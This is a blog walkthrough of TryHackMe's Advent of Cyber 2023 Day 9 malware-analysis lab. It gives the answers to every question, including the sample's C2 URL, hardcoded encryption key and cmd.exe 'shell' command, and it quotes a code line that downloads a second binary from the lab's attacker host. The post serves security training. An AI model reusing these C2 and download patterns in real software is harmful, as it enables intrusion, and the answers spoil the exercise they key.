Walkthrough of Advent of Cyber 2023 Day 09

Hey, cyber enthusiasts! How are you doing, guys?
I’m in a great mood and ready to solve the challenges of the Advent of Cyber 2023.

TryHackMe has released the task for day 9 of the Advent of Cyber 2023. So here I am with it’s walkthrough.

Throughout this room, you will learn the foundations of analysing malware samples safely, the fundamentals of .NET binaries, the dnSpy tool for decompiling malware samples written in .NET, and building an essential methodology for analysing malware source code.

Malware, short for malicious software, is any program or code designed to cause harm to a computer system or its users. This broad category encompasses various types of harmful software with malicious intent. Malware is created by cybercriminals to gain unauthorized access, steal sensitive information, disrupt operations, or carry out other harmful activities. Viruses, Trojans, Worms, Spyware, Ransomware, Adware, etc. are just common types of malware. 

Malware handling refers to the process of detecting, analyzing, containing, eradicating, and recovering from a malware infection. The goal of malware handling is to effectively respond to and neutralize the threat posed by malicious software. This process involves various steps, including detection, analysis, containment, eradication, and recovery.

Malware analysis is the process of inspecting, understanding, and dissecting malicious software, commonly known as malware, to gain insights into its functionality, behavior, and potential impact. The primary objectives of malware analysis are to identify the purpose of the malware, understand its methods of operation, and develop countermeasures to detect and mitigate its effects. 

.NET binaries are executable files containing compiled code written in .NET languages like C#, VB.NET, and F#. They run on the .NET runtime environment, which provides the necessary libraries and services for the code to execute.

dnSpy is a free and open-source debugger and assembly editor specifically designed for the .NET Framework and .NET. It provides a comprehensive set of features for analyzing, debugging, and modifying.

I just gave an introduction to each topic. Because when you go through their documentation of this room, you will see how well they have explained it. So explaining the same thing is just a waste of time.

It’s my request to all readers to please go through their documentation. Don’t skip any part because its very informative and useful.  Now let’s quickly move on to the challenges. The first question is

What HTTP User-Agent was used by the malware for its connection requests to the C2 server?

You can easily identify the user agent used by the malware in the ‘GetIt’ function of this malware.

Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15

What is the HTTP method used to submit the command execution output?

In the main function of this malware, you can see the ninth line string str2 = Program.PostIt(url, data).

POST

What key is used by the malware to encrypt or decrypt the C2 data?

In both encryption and decryption functions, they have used the same key.

youcanthackthissupersecurec2keys

What is the first HTTP URL used by the malware?

In the fourth line of main function code, you can see that it has used http://mcgreedysecretc2.thm/reg HTTP url. string str = http://mcgreedysecretc2.thm

http://mcgreedysecretc2.thm/reg

How many seconds is the hardcoded value used by the sleep function?

In the main function, you will see that the Sleeper function is using the count variable, and the value of the count variable is 15,000 (ms), which is 15 seconds.

15

What is the C2 command the attacker uses to execute commands via cmd.exe?

We can see in the 32th line of the Main function that it is using the shell command to execute commands via cmd.exe.

shell

What is the domain used by the malware to download another binary?

In the 43rd line of Main function, you will see that the domain used by the malware to download another binary is stash.mcgreedy.thm.
string text2 = Program.Implant(“http://stash.mcgreedy.thm/spykit.exe”);

stash.mcgreedy.thm

I kept this walkthrough straight to the point. I hope you guys find this useful. If you guys have any doubts, please connect me to LinkedIn and feel free to resolve your doubts. And stay connected for every day’s challenges and walkthroughs.

Check out our YouTube channel, Ethical Empire.

If you’re preparing for the CEH Practical Exam, don’t forget to check out our playlist, ‘CEH Practical Exam Preparation’.

Until next time, stay secure, stay curious, and keep exploring the fascinating world of cyber security.